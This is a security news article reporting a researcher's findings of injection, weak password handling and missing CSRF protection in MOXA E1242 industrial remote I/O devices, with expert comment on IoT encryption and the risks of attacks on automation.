Patch/Configuration Management, Threat Management, Vulnerability Management

Researcher finds flaws in industrial control devices

In a report by Applied Risk, ICS security researcher, Alexandru Ariciu, said that flaws found in MOXA E1242 Ethernet remote I/O series used in factory automation, range from code injection in the web application to weak password policies and implementation.

One of the problems lies in the devices web application that fails to sanitise user input, resulting in Javascript injection in the webpage. An exploit could allow an attacker to execute arbitrary code in the context of the browser of the users visiting the affected web pages.

“An attacker can exploit this by visiting the affected web pages and modifying the parameters that were found to be vulnerable to this attack. The changes to this parameter are permanent, thus any user visiting the infected web page after the attacker will be at risk,” he said.

Another issue is that passwords are sent via the HTTP GET method. The md5 hash of the password that is used for authentication on the device is sent as a parameter in each GET request to the server. “This is considered to be bad practice, as an attacker with a MITM position can easily circumvent this implementation and bypass the authentication mechanism,” said Ariciu.

Also the password used to authenticate users to the system is truncated to eight characters. Any user trying to use a longer password will have its password cut down to the first eight characters. Also, the MD5 hash challenge that is created for authentication and is later used in all GET requests will be created using these first eight characters.

“This behaviour is considered to be insecure, as it does not provide sufficient protection to the passwords used by the user and also forces the user to use simple passwords that can be easily bypassed,” he said.

Lastly, it was found that the application lacks CSRF protection mechanisms. An attacker can use this vulnerability to modify the device parameters, settings, restart the device or restore the device to factory settings.

Kevin Bocek, chief security strategist at Venafi, told SCMagazineUK.com that organisations can no longer be prepared to accept that their Internet of Things (IoT) devices fail to communicate using encryption.

“Time and time again we see that IoT devices, from industrial control interfaces to cars, can expose passwords, allow communications to be hijacked, and accept potentially malicious commands,” he said.

“In all cases, encrypted HTTPS communications were not used or digital certificates not properly validated to uniquely identify devices and applications. As is the case with Moxa devices and the IoT itself we must make sure all devices use encrypted HTTPS communications authenticated with trusted digital certificates.”

Mark James, security specialist at ESET, told SC that most of the flaws we see in the automation industry are proof of concept, it usually involves a specific environment to be in place but the impact could in some cases be catastrophic.

“Automation often involves heavy equipment doing precision work and if it fails it could cause thousands of pounds of damage. If that equipment were to go wrong around or close to humans then there is always the potential of injury or even death,” he said.

He added that it's virtually impossible to have any software driven machinery that is 100 percent secure.

“The very nature of software dictates that there is always the possibility of someone somewhere finding a way to do something that was not intended to be done. What's important is how quickly it's fixed, as more and more automation takes place it's important to ensure the security is taken very seriously. Isolating systems and ensuring only physical access is required to update and maintain systems will keep the attack footprint down.”

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.